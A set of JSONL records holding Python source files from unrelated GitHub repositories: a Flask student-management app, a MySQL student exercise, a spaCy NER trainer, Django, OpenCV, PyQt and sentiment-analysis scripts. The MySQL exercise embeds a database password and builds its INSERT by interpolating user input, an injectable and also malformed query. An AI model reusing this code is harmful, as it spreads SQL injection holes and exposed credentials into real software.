URL\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n\n username = request.form.get('username')\n password = request.form.get('password')\n remember = True if request.form.get('remember') else False\n userType = request.form.get('userType', default='admin')\n if request.method == 'POST':\n user = None\n if(userType == \"admin\"):\n user = query_User(username)\n elif(userType == \"student\"):\n user = query_StudentUser(username)\n else:\n return errorPWD, 400\n\n if user is None or not user.check_password(password):\n return errorPWD, 400\n\n next = request.form.get('next')\n\n if not utils.is_safe_url(next, request):\n return abort(400)\n\n login_user(user, remember=remember)\n session['user_type'] = userType\n\n # 如果 URL 中带有 next 参数则跳转到 next 页面\n # URL = 127.0.0.1/login?next=/index\n if(next): # next 不为空\n next = next\n else: # next 空\n next = url_for('index')\n return json.dumps({\"status\": 200, \"msg\": \"登录成功\", \"next\": next}), 200\n # GET 请求\n return json.dumps({\"status\": 400, \"msg\": \"请使用Post请求。\"}), 400\n\n# 登出\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return render_template('login.html')\n\n# ajax 登出\n@app.route('/ajax/logout')\n@login_required\ndef logout_ajax():\n logout_user()\n next = request.args.get('next')\n # 如果 URL 中带有 next 参数则跳转到 next 页面\n if(next): # next 不为空\n next = next\n else: # next 空\n next = url_for('index')\n return json.dumps({\"status\": 200, \"msg\": \"已注销。\", \"next\": next}), 200\n\n# 列出学生信息\n@app.route('/students/list', methods=['get'])\n@login_required\ndef get_students_list():\n # 返回不包含密码的其他记录\n return json.dumps(query_StudentsListNotPwd())\n\n# 添加学生信息\n@app.route('/student/add', methods=['POST'])\n@login_required\ndef student_add():\n if request is None:\n return json.dumps({\"status\": 400, \"msg\": \"添加失败,请重新填写。\"}), 400\n id = request.form.get('id', type=int)\n name = request.form.get('name', type=str)\n age = request.form.get('age', type=int, default=None)\n funds = request.form.get('funds', type=float, default=None)\n addr = request.form.get('addr', type=str, default=None)\n honor = request.form.get('honor', type=str, default=None)\n password = request.form.get('password', type=str, default=None)\n\n if name == '':\n return json.dumps({\"status\": 400, \"msg\": \"添加失败,请输入姓名。\"}), 400\n\n stu = Student(id=id, name=name, age=age,funds=funds, addr=addr, honor=honor)\n stu.set_password_hash(password) # 密码 hash 加密\n add_Student(stu)\n return json.dumps({\"status\": 200, \"msg\": f\"添加用户 {name} 成功。\"}), 200\n\n# 删除学生\n@app.route('/student/del', methods=['POST'])\n@login_required\ndef student_del():\n if request is None:\n return json.dumps({\"status\": 400, \"msg\": \"删除失败,请刷新重试。\"}), 400\n id = request.form.get('id', type=int)\n if id == None:\n return json.dumps({\"status\": 400, \"msg\": \"删除失败,请刷新��试。\"}), 400\n del_StudentById(id)\n return json.dumps({\"status\": 200, \"msg\": f\"删除 ID 为 {id} 的用户成功。\"}), 200\n\n# 编辑学生\n@app.route('/student/edit', methods=['POST'])\n@login_required\ndef student_edit():\n if request is None:\n return json.dumps({\"status\": 400, \"msg\": \"修改失败,请刷新重试。\"}), 400\n\n id = request.form.get('id', type=int)\n name = request.form.get('name', type=str)\n age = request.form.get('age', type=int, default=None)\n funds = request.form.get('funds', type=float, default=None)\n addr = request.form.get('addr', type=str, default=None)\n honor = request.form.get('honor', type=str, default=None)\n password = request.form.get('password', type=str, default=None)\n stu = query_StudentById(id)\n if id is None or stu is None:\n return json.dumps({\"status\": 400, \"msg\": \"修改失败,请刷新重试。\"}), 400\n stuEdit = Student(id=id, name=name, age=age,funds=funds, addr=addr, honor=honor)\n if(password!=None and password!=\"\"):\n stuEdit.set_password_hash(password)\n else:\n stuEdit.password=stu.password\n edit_Student(stuEdit)\n return json.dumps({\"status\": 200, \"msg\": f\"修改 ID 为 {id} 的用户成功。\"}), 200\n\n\n@app.route('/student/columns', methods=['POST'])\n@login_required\ndef student_columns():\n # fields = query_Students_Fields()\n pass\n\n# @app.teardown_request\n# def shutdown_session(exception=None):\n# db.remove()\n\n\n# 防止被引用后执行,只有在当前模块中才可以使用\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","repo_name":"YuLiang28/PKD","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71359708407","text":"from flask_mysqldb import MySQLdb\nfrom contextlib import closing\n\n__dados = {'host': \"mysql.topskills.study\",\n 'database': 'topskills01',\n 'user': 'topskills01',\n 'passwd': 'ts2019',\n 'port': 3306}\n\ndef cadastrar (nome, idade, telefone):\n with closing(MySQLdb.connect(**__dados)) as conn:\n cursor = conn.cursor()\n cursor.execute (f\"INSERT INTO topskills01.danielilagacione(nome, idade, telefone)VALUES('{nome}',{idade}');\")\n conn.commit()\n\ndef consultarAll():\n with closing(MySQLdb.connect(**__dados)) as conn:\n cursor = conn.cursor()\n cursor.execute('SELECT * FROM danielilagacione')\n print('\\nSó uma linha: ', cursor.fetchone())\n print('\\nVárias linhas',cursor.fetchall())\n\nfor i in range (3):\n nome = input('Digite Nome:')\n idade = int(input('Digite a idade:'))\n telefone = int(input('Digite o telefone:'))\n cadastrar(nome, idade)\n\nconsultarAll() \n","repo_name":"danylagacione/TrabalhosPython","sub_path":"Aula30/aula31.py","file_name":"aula31.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43008004410","text":"from __future__ import unicode_literals, print_function\n\nimport srsly\nimport plac\nimport random\nfrom pathlib import Path\nimport spacy\nfrom spacy.util import minibatch, compounding\n\ninput_model = \"en_core_web_md\"\noutput_model = \"en_core_ner_v11\"\nfpath = \"data/ner_profile_train_v11.jsonl\"\n\n# load_TRAIN_DATA\nobj = srsly.read_jsonl(fpath)\nTRAIN_DATA = []\nfor record in obj:\n if record[\"answer\"] == \"accept\":\n spans = record.get(\"spans\", [])\n entities = [(span[\"start\"], span[\"end\"], span[\"label\"]) for span in spans]\n TRAIN_DATA.append((record[\"text\"], {\"entities\": entities}))\n\nprint(\"training data size:\")\nprint(len(TRAIN_DATA))\n\n\n@plac.annotations(\n model=(\"Model name. Defaults to blank 'en' model.\", \"option\", \"m\", str),\n new_model_name=(\"New model name for model meta.\", \"option\", \"nm\", str),\n output_dir=(\"Optional output directory\", \"option\", \"o\", Path),\n n_iter=(\"Number of training iterations\", \"option\", \"n\", int),\n)\ndef main(\n model=input_model, new_model_name=output_model, output_dir=output_model, n_iter=1000\n):\n \"\"\"Set up the pipeline and entity recognizer, and train the new entity.\"\"\"\n random.seed(0)\n if model is not None:\n nlp = spacy.load(model) # load existing spaCy model\n print(\"Loaded model '%s'\" % model)\n else:\n nlp = spacy.blank(\"en\") # create blank Language class\n print(\"Created blank 'en' model\")\n # Add entity recognizer to model if it's not in the pipeline\n # nlp.create_pipe works for built-ins that are registered with spaCy\n if \"ner\" not in nlp.pipe_names:\n ner = nlp.create_pipe(\"ner\")\n nlp.add_pipe(ner, last=True)\n # otherwise, get it, so we can add labels to it\n else:\n ner = nlp.get_pipe(\"ner\")\n\n # add labels\n for _, annotations in TRAIN_DATA:\n for ent in annotations.get(\"entities\"):\n ner.add_label(ent[2])\n\n # get names of other pipes to disable them during training\n pipe_exceptions = [\"ner\", \"trf_wordpiecer\", \"trf_tok2vec\"]\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n with nlp.disable_pipes(*other_pipes): # only train NER\n # reset and initialize the weights randomly – but only if we're\n # training a new model\n if model is None:\n nlp.begin_training()\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n losses = {}\n # batch up the examples using spaCy's minibatch\n batches = minibatch(TRAIN_DATA, size=compounding(4.0, 32.0, 1.001))\n for batch in batches:\n texts, annotations = zip(*batch)\n nlp.update(\n texts, # batch of texts\n annotations, # batch of annotations\n drop=0.5, # dropout - make it harder to memorise data\n losses=losses,\n )\n print(\"Losses\", losses)\n\n # save model to output directory\n if output_dir is not None:\n output_dir = Path(output_dir)\n if not output_dir.exists():\n output_dir.mkdir()\n nlp.to_disk(output_dir)\n print(\"Saved model to\", output_dir)\n\n\nif __name__ == \"__main__\":\n plac.call(main)\n","repo_name":"TangHan54/spacy_train_ner_model","sub_path":"train_ner_model.py","file_name":"train_ner_model.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7975870720","text":"from ui.screen import Screen\n\nfrom utils.config import Config\nfrom utils.configurator import Configurator\nfrom jobs.helpers.circus_handler import CircusHandler\nfrom jobs.buffer import Buffer\n\nclass CircusScreen(Screen):\n\n buttons = [['Get quests', 'quests'], ['Go to dungeon', 'dungeon'], ['Go to dungeon with party', 'party_dungeon'], ['Back', 'back']]\n\n def __init__(self, message, bot):\n super().__init__(message, bot)\n self.title = 'Circus:'\n self.load_config()\n\n def render(self, call=None):\n self.markup.keyboard = []\n for b in self.buttons:\n self.markup.add(self.InlineKeyboardButton(b[0],\n callback_data='{name}.{action}'.format(name=self.name, action=b[1].lower())))\n if call is None:\n self.send()\n else:\n self.edit(call)\n\n def quests(self, call, state):\n self.bot.answer_callback_query(call.id, 'Get circus quests')\n\n buff_cfg = Configurator(self.config['buffer']).from_yaml()\n buff_cfg['spawn'] = True\n buff_cfg['logout'] = True\n\n buff = Buffer(buff_cfg)\n\n for i in range(8):\n CircusHandler().get_quest()\n buff.process_flow()\n\n return None, None\n\n def dungeon(self, call, state):\n CircusHandler().go_to_dungeon(False)\n return None, None\n\n def party_dungeon(self, call, state):\n CircusHandler().go_to_dungeon(True)\n return None, None\n\n def back(self, call, state):\n ss = state['StartScreen']\n ss.render(call=call)\n return ss.name, ss\n\n def load_config(self):\n Config().initialize_configs(self.config['navigator'])","repo_name":"MaxymHybalo/serial_bot","sub_path":"ui/circus_screen.py","file_name":"circus_screen.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35903743930","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django_filters import FilterSet\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom core.models import Order\nfrom core.serializers import OrderSerializer\n\n\nclass OrderFilterSet(FilterSet):\n class Meta:\n model = Order\n fields = {\n 'ordered': ['exact']\n }\n\n\nclass OrderView(viewsets.ModelViewSet):\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n filter_backends = [DjangoFilterBackend]\n filter_class = OrderFilterSet\n\n @action(detail=False, methods=['get'])\n def latest(self, request, pk=None):\n order = None\n user = request.user\n try:\n order = Order.objects.get(user=user.id, ordered=False)\n except ObjectDoesNotExist:\n order = Order.objects.create(user=user)\n serializer = OrderSerializer(order)\n return Response(serializer.data)\n","repo_name":"ChadMcCaulley/DjangoEcommerce","sub_path":"core/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27062935260","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# file:cannys\n# Author : jiangna\n# desctription: 处理边缘化标签\n# datetime: 22-10-28 下午1:17 \n# ============================\n\nimport os\n\nimport cv2\nimport numpy as np\n\n# 1.高斯滤波去噪声\n# 2.sobel计算梯度及角度\n# g =np.sqrt(Gx**2 + Gy**2)\n# theta = np.tan(Gy/Gx)\n# eg: P5sobel=|P5x|+|P5y|=|(p3-p2)+2(p6-p5)+(p9-p7)|+|(p7-p1)+2(p8-p2)+(p9-p3)|\n# 3.极大值抑制\n# 4.阈值滞后\n\n\nwindowname = \"OpenCV Media Player\"\ncv2.namedWindow(windowname)\n\n\ndef read_image(img, png, dest):\n filename, filespl = os.path.splitext(img)\n\n image = cv2.imread(img)\n\n # 边缘检测\n thresh = cv2.Canny(image, 32, 256)\n thresh, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n \"\"\"\n thresh: 目标图像\n contours: 轮廓本身\n hierarchy:\n \"\"\"\n save_path = f\"{dest}/{png}\"\n cv2.imwrite(save_path, thresh)\n\n # # 轮廓绘制\n # save_path = f\"{dest}/{filename}_mark{filespl}\"\n # img = cv2.drawContours(image, contours, -1, (0, 0, 255,), 3)\n # cv2.imwrite(save_path, img)\n\n\n# read_image('train_data_21_0.png', \".\")\n# cv2.waitKey()\n#\n# cv2.destroyWindow(windowname)\n\n\nbase_path = os.path.dirname(os.path.dirname(__file__))\n# label_path = f\"{base_path}/data/mszs_train256_1/val_label\"\n# edge_path = f\"{base_path}/data/mszs_train256_1/val_edge\"\n\nlabel_path = f\"{base_path}/data/archive_train256_3/val_label\"\nedge_path = f\"{base_path}/data/archive_train256_3/val_edge\"\n\nfor png in os.listdir(label_path):\n read_image(f\"{label_path}/{png}\", png, edge_path)\n","repo_name":"jiangna123/pid_net","sub_path":"utils/cannys.py","file_name":"cannys.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45559910503","text":"import tvm\nimport numpy as np\n\ndef test_local_multi_stage():\n if not tvm.module.enabled(\"opengl\"):\n return\n if not tvm.module.enabled(\"llvm\"):\n return\n\n n = tvm.var(\"n\")\n A = tvm.placeholder((n,), name='A', dtype=\"int32\")\n B = tvm.compute((n,), lambda i: A[i] + 1, name=\"B\")\n C = tvm.compute((n,), lambda i: B[i] * 2, name=\"C\")\n\n s = tvm.create_schedule(C.op)\n s[B].opengl()\n s[C].opengl()\n\n f = tvm.build(s, [A, C], \"opengl\", name=\"multi_stage\")\n\n ctx = tvm.opengl(0)\n n = 10\n a = tvm.nd.array(np.random.uniform(size=(n,)).astype(A.dtype), ctx)\n c = tvm.nd.array(np.random.uniform(size=(n,)).astype(B.dtype), ctx)\n f(a, c)\n\n np.testing.assert_allclose(c.asnumpy(), (a.asnumpy() + 1) * 2)\n\nif __name__ == \"__main__\":\n test_local_multi_stage()\n","repo_name":"researchmm/tasn","sub_path":"tasn-mxnet/3rdparty/tvm/tests/webgl/test_local_multi_stage.py","file_name":"test_local_multi_stage.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"76"} +{"seq_id":"21015783051","text":"#!/usr/bin/python3.4\n__author__ = 'allen'\n\nimport requests\nimport re\nimport webbrowser\nimport functools\nimport logging\nimport sys\nfrom os import path\nfrom time import sleep\nfrom PyQt4 import QtGui\n\ndirectory = path.abspath(path.dirname(__file__))\nrefs = path.join(directory, \"refs.txt\")\ngood_icon = path.join(directory, \"goodTW.png\")\nbad_icon = path.join(directory, \"badTW.png\")\n\nlogging.basicConfig(filename=directory+'/tw.log',\n level=logging.INFO,\n format='%(asctime)s %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %I:%M:%S')\nlogging.info('Start')\n\n\ndef check_connection():\n try:\n requests.get(\"http://www.google.ru\")\n return True\n except:\n return False\n\n\ndef parse_title(ref):\n req = requests.get(ref)\n expr = re.compile('.*')\n title = expr.search(req.text).group()[7:-8]\n expr = re.compile('[^/]*/')\n name = expr.search(title).group()[:-1]\n expr = re.compile('\\d+\\sиз')\n if expr.search(title) is not None:\n number = expr.search(title).group()[:-3]\n else:\n expr = re.compile('\\d+\\s[(]')\n number = expr.search(title).group()[:-2]\n return [name, number]\n\n\ndef change_line(filename, cur, new):\n file = open(filename, 'r')\n text = file.read()\n file.close()\n file = open(filename, 'w')\n file.write(text.replace(cur, new))\n file.close()\n\n\nclass SystemTrayIcon(QtGui.QSystemTrayIcon):\n def __init__(self, parent=None):\n icon = QtGui.QIcon(good_icon)\n QtGui.QSystemTrayIcon.__init__(self, icon, parent)\n\n self.menu = QtGui.QMenu(parent)\n self.menu.addAction(\"Add\").triggered.connect(self.add)\n self.watchers = QtGui.QMenu(\"Watchers\", self.menu)\n self.menu.addMenu(self.watchers)\n self.menu.addAction(\"Update\").triggered.connect(self.update)\n self.menu.addAction(\"Remove\").triggered.connect(self.remove)\n self.menu.addSeparator()\n self.menu.addAction(\"Exit\").triggered.connect(QtGui.qApp.quit)\n self.setContextMenu(self.menu)\n logging.info(\"GUI initialized\")\n\n self.changing = []\n self.update()\n\n def add(self):\n file = open(refs, 'r+')\n file.read()\n text, ok = QtGui.QInputDialog.getText(QtGui.QInputDialog(), 'Add watcher', 'Enter URL:')\n if ok:\n try:\n title = parse_title(str(text))\n file.write(str(text)+'\\n')\n file.write(title[0]+\"||| \"+title[1]+'\\n')\n self.watchers.addAction(title[0]+\"||| \"+title[1])\n file.flush()\n logging.info(str(text)+\" added\")\n except requests.exceptions.MissingSchema:\n logging.warning(\"Wrong URL: \"+str(text))\n\n def update(self):\n if check_connection():\n self.changing = []\n file = open(refs, 'r')\n self.watchers.clear()\n logging.info(\"Update started...\")\n try:\n for line in file:\n if line[:4] == \"http\":\n url = line[:-1]\n new_title = parse_title(line[:-1])\n elif new_title[0]+\"||| \"+new_title[1] == line[:-1]:\n self.watchers.addAction(line[:-1]).\\\n triggered.connect(functools.partial(webbrowser.open_new_tab, url))\n elif line[0] != '\\n':\n self.setIcon(QtGui.QIcon(bad_icon))\n self.changing.append([line, new_title[0]+\"||| \"+new_title[1]+'\\n', url])\n self.watchers.addAction(line[:-1]+\" >>> \"+new_title[1]).\\\n triggered.connect(functools.partial(self.change, len(self.changing)-1))\n except:\n logging.critical(\"Wrong URL in refs.txt\")\n else:\n logging.critical(\"No connection to Internet, can't update\")\n\n def change(self, i):\n self.setIcon(QtGui.QIcon(good_icon))\n change_line(refs, self.changing[i][0], self.changing[i][1])\n webbrowser.open_new_tab(self.changing[i][2])\n sleep(0.5)\n self.update()\n\n def remove(self):\n text, ok = QtGui.QInputDialog.getText(QtGui.QInputDialog(), 'Remove watcher', 'Remove URL:')\n file = open(refs, 'r')\n if ok:\n st = ''\n flag = False\n for line in file:\n if flag:\n st = line\n flag = False\n if line == str(text)+'\\n':\n flag = True\n if st != '':\n change_line(refs, st, '')\n change_line(refs, str(text)+'\\n', '')\n logging.info(str(text)+\" removed\")\n self.update()\n\n\ndef main():\n if check_connection():\n app = QtGui.QApplication(sys.argv)\n QtGui.QApplication.setQuitOnLastWindowClosed(False)\n tray = SystemTrayIcon()\n tray.show()\n sys.exit(app.exec_())\n else:\n logging.critical(\"No connection to Internet\")\n exit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IlyaGusev/TorrentWatcher","sub_path":"watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5039455960","text":"from __future__ import annotations\n\nimport pandas as pd\nimport pytest\n\nfrom tests.utils import convert_dataframe_to_pandas_numpy\nfrom tests.utils import integer_dataframe_1\nfrom tests.utils import integer_dataframe_2\nfrom tests.utils import interchange_to_pandas\n\n\ndef test_get_rows_by_mask(library: str) -> None:\n df = integer_dataframe_1(library)\n namespace = df.__dataframe_namespace__()\n mask = namespace.column_from_sequence(\n [True, False, True], dtype=namespace.Bool(), name=\"result\"\n )\n result = df.get_rows_by_mask(mask)\n result_pd = interchange_to_pandas(result, library)\n result_pd = convert_dataframe_to_pandas_numpy(result_pd)\n expected = pd.DataFrame({\"a\": [1, 3], \"b\": [4, 6]})\n pd.testing.assert_frame_equal(result_pd, expected)\n\n\ndef test_get_column_by_name_invalid_lazy() -> None:\n df1 = integer_dataframe_1(\"polars-lazy\")\n df2 = integer_dataframe_2(\"polars-lazy\")\n with pytest.raises(\n ValueError, match=\"Column was created from a different dataframe!\"\n ):\n df1.get_rows_by_mask(df2.get_column_by_name(\"a\") > 0)\n","repo_name":"MarcoGorelli/impl-dataframe-api","sub_path":"tests/dataframe/get_rows_by_mask_test.py","file_name":"get_rows_by_mask_test.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70607204087","text":"import numpy as np\r\nimport cv2,time\r\nfrom sklearn import svm\r\nfrom sklearn.datasets import fetch_openml\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import ImageGrab\r\nimport glob,csv,os\r\nfrom sklearn import svm\r\nimport pandas as pd\r\n\r\n#run it for label=\"0...9\"\r\nlabel=\"0\"\r\nimg_list=glob.glob(\"F:\\ML\\Dataset/\"+label+\"/*.png\")\r\nfor i in img_list:\r\n img=cv2.imread(i,0)\r\n gray=cv2.GaussianBlur(img,(15,15),0)\r\n roi=cv2.resize(gray,(28,28),interpolation=cv2.INTER_AREA) #region of interest\r\n X=[]\r\n X.append(label)\r\n row,col=roi.shape\r\n for x in range(row):\r\n for y in range(col):\r\n k=roi[x,y]\r\n if(k>100):\r\n k=1\r\n else: \r\n k=0\r\n X.append(k)\r\n \r\n with open(\"F:\\ML\\Dataset\\data.csv\",'a') as f: #append in binary\r\n writer=csv.writer(f)\r\n writer.writerow(X)\r\n \r\n\r\ndf=pd.read_csv(\"F:\\ML\\Dataset\\data.csv\")\r\ndf=df.sample(frac=1).reset_index(drop=True)\r\nXt=df.drop([\"1\"],axis=1)\r\nYt=df[\"1\"]\r\n\r\n#x_train,y_train=Xt[:10],Yt[:10]\r\nclf = svm.SVC()\r\nclf.fit(Xt,Yt)\r\n\r\n\r\n\r\n\r\nfor i in range(20):\r\n time.sleep(5) \r\n live_img=ImageGrab.grab(bbox=(80,80,200,200))\r\n live_img\r\n live_img.save(\"F:\\ML\"+str(i)+\".png\")\r\n # gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) -> 0 in imread\r\n img=cv2.imread(\"F:\\ML\"+str(i)+\".png\",0)\r\n img\r\n gray=cv2.GaussianBlur(img,(15,15),0)\r\n #ret,th_img=cv2.threshold(gray,100,255,cv2.THRESH_BINARY)\r\n re=cv2.resize(gray,(28,28),interpolation=cv2.INTER_AREA)\r\n #re.shape\r\n #cv2.imshow(\"live_img\",re) \r\n #cv2.waitKey(0)\r\n X=[]\r\n a=-1\r\n row,col=re.shape\r\n for x in range(row):\r\n for y in range(col):\r\n k=re[x,y]\r\n if(k>100): \r\n k=1\r\n else: \r\n k=0\r\n X.append(k)\r\n pred=clf.predict([X]) \r\n print(pred)\r\n # print(len(X))\r\n #arr=np.array(X)\r\n #len(X)\r\n #arr.shape\r\n #[X]\r\n # pred=clf.predict(x_test)\r\n \r\n# print(\"prediction:\"+pred[0])","repo_name":"aman4aug2011/Digit_Recognition","sub_path":"digitrecog_own.py","file_name":"digitrecog_own.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73305691124","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport httplib, urllib, mimetypes\n\ndef post_multipart(host, selector, fields, files):\n content_type, body = encode_multipart_formdata(fields, files)\n h = httplib.HTTPConnection(host)\n headers = {\n 'Content-Type': content_type\n }\n h.request('POST', selector, body, headers)\n res = h.getresponse()\n return res\n\ndef encode_multipart_formdata(fields, files):\n BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$'\n CRLF = '\\r\\n'\n L = []\n for (key, value) in fields:\n L.append('--' + BOUNDARY)\n L.append('Content-Disposition: form-data; name=\"%s\"' % key)\n L.append('')\n L.append(value)\n for (key, filename, value) in files:\n L.append('--' + BOUNDARY)\n L.append('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (key, filename))\n L.append('Content-Type: %s' % get_content_type(filename))\n L.append('')\n L.append(value)\n L.append('--' + BOUNDARY + '--')\n L.append('')\n body = CRLF.join(L)\n content_type = 'multipart/form-data; boundary=%s' % BOUNDARY\n return content_type, body\n\ndef get_content_type(filename):\n return mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n\ndef cap(word_with_underscores):\n parts = word_with_underscores.split(\"_\")\n return \" \".join(map(str.capitalize, parts))\n\ndef read_tags(path):\n tag_lines = open(os.path.join(paintings_path, \"tags\")).readlines()\n tags = {}\n for line in tag_lines:\n tokens = line.split(\"=\")\n tags[tokens[0]] = str.strip(tokens[1])\n return tags\n\ndef import_paintings(paintings_path, type):\n tags = (type == \"match\" and read_tags(paintings_path)) or \"\"\n conn = httplib.HTTPConnection(\"localhost\", 7070)\n try:\n for file in os.listdir(paintings_path):\n tokens = file.split(\".\") \n if len(tokens) == 2 and tokens[1] == \"jpg\":\n artist, title = tokens[0].split(\"|\")\n img_tags = (title in tags and tags[title]) or \"\"\n artist, title = map(cap, (artist, title))\n fields = [(\"painting-artist\", artist), (\"painting-title\", title), (\"painting-strategy\", \"1\"), (\"painting-tags\", img_tags)]\n files = [(\"uploaded-file\", file, open(os.path.join(paintings_path,file), 'r').read())]\n post_multipart(\"localhost:7070\", \"/panel/upload\", fields, files)\n except:\n raise\n \nif __name__ == \"__main__\":\n type = \"all\"\n if len(sys.argv) > 1:\n type = sys.argv[1]\n paintings_path = os.path.join(\"/Users/alexis\",\"Desktop\",\"Dev\",\"TSP\",\"paintings\",type)\n import_paintings(paintings_path, type)","repo_name":"alexmic/the-switchable-painting","sub_path":"script/misc/painting_import.py","file_name":"painting_import.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"31109749812","text":"# scatterplots = great for corelation of values \n\n#________________________________________________________\n# RESOURCES\n\n# https://matplotlib.org/3.1.0/tutorials/colors/colormaps.html\n# https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html\n\n#________________________________________________________\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nplt.style.use('seaborn')\n\nx = [5, 7, 8, 5, 6, 7, 9, 2, 3, 4, 4, 4, 2, 6, 3, 6, 8, 6, 4, 1]\ny = [7, 4, 3, 9, 1, 3, 2, 5, 2, 4, 8, 7, 1, 6, 4, 9, 7, 7, 5, 1]\n\ncolors = [7, 5, 9, 7, 5, 7, 2, 5, 3, 7, 1, 2, 8, 1, 9, 2, 5, 6, 7, 5]\n\nsizes = [209, 486, 381, 255, 191, 315, 185, 228, 174,\n 538, 239, 394, 399, 153, 273, 293, 436, 501, 397, 539]\n\ndata = pd.read_csv('/Users/User/Desktop/Python/Python_MathPlotLib/chartData/DATA_Scatter_Plot.txt')\n\ndef main() -> None:\n\n# ________________________________________________\n # print('Hello World!')\n \n # plt.scatter(x, y, s=100, c='blue', edgecolor='black', linewidth=1, alpha=0.75)\n # # marker='x' # add to above\n\n # plt.scatter(x, y, s=sizes, c=colors, cmap='Blues', edgecolor='black', linewidth=1, alpha=0.75)\n \n # cbar = plt.colorbar()\n # cbar.set_label('Satisfaction')\n\n # plt.tight_layout()\n # plt.show()\n# ________________________________________________\n\n view_count = data['view_count']\n likes = data['likes']\n ratio = data['ratio']\n\n plt.scatter(view_count, likes, c=ratio, cmap='summer', edgecolor='black', linewidth=1, alpha=0.75)\n\n plt.xscale('log') # fixes outliers\n plt.yscale('log') # fixes outliers\n \n cbar = plt.colorbar()\n cbar.set_label('Like/Dislike Ratio')\n\n plt.title('Trending YouTube Videos')\n plt.xlabel('View Count')\n plt.ylabel('Total Likes')\n\n plt.tight_layout()\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Shaun103/Python_Notes","sub_path":"Python_MathPlotLib/7_Scatter_Plots/scatter_plots.py","file_name":"scatter_plots.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7135643843","text":"import numpy as np\nimport spacy\nimport argparse\nimport csv\nimport datetime as tm\nfrom pathlib import Path\nimport yaml\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom textblob import TextBlob\nimport os\n\ndir = str(Path(__file__).parents[0])\ntrain_parsing_instructions = {'beginning': [2],\n 'body': [3, 4],\n 'climax': [5],\n 'ending': [6]}\neval_parsing_instructions = {'beginning': [1],\n 'body': [2, 3],\n 'climax': [4],\n 'ending1': [5],\n 'ending2': [6]}\ntest_parsing_instructions = {'beginning': [0],\n 'body' : [1,2],\n 'climax': [3],\n 'ending1': [4],\n 'ending2': [5]\n }\nstory_struct={'beginning': 0,\n 'body': 1,\n 'climax': 2,\n 'ending': 3,\n 'context': 'sum'}\ndefault_probas = [{'posterior': 'ending', 'prior': ['climax', 'body', 'beginning']},\n {'posterior': 'ending', 'prior': ['climax', 'body']},\n {'posterior': 'ending', 'prior': 'climax'},\n {'posterior': 'ending', 'prior': 'context'}]\nvader_pos = .05\nvader_neg = -.05\nblob_pos = .1\nblob_neg = -.1\n\ndefault_sent = {'method': 'average'}\n\ndef load_stories(filename, parsing_instructions, header=True):\n \"\"\"\n Load the stories from filename and sort them in three\n dimensions: the 4 first concatenated sentences, the\n first proposition and the second option.\n \"\"\"\n if(not Path(filename).exists()):\n raise Exception(filename + \" cannot be found. Aborting.\")\n stories = []\n with open(filename, 'r') as csvfile:\n if header:\n csvfile.readline()\n\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n segmented_story = []\n for _, sentences in parsing_instructions.items():\n seg = ''\n for sentence in sentences:\n seg = seg + row[sentence] + ' '\n\n segmented_story = segmented_story + [seg]\n stories.append(segmented_story)\n\n return stories\n\nclass SentimentAnalyzer:\n '''\n Class to perform sentiment analysis on a given dataset.\n Required arguments for init:\n -sentiment_files_path_dict: this dict lists the paths to the different lexicons to load\n as sentiments references. For the moment this is hard coded into\n positive, negative and mpqa.\n Attributes\n -probas_wanted:\n list of probabilities to compute. Default is hard coded list from paper.\n Has to be coded as list of dicts, where each dict is contains 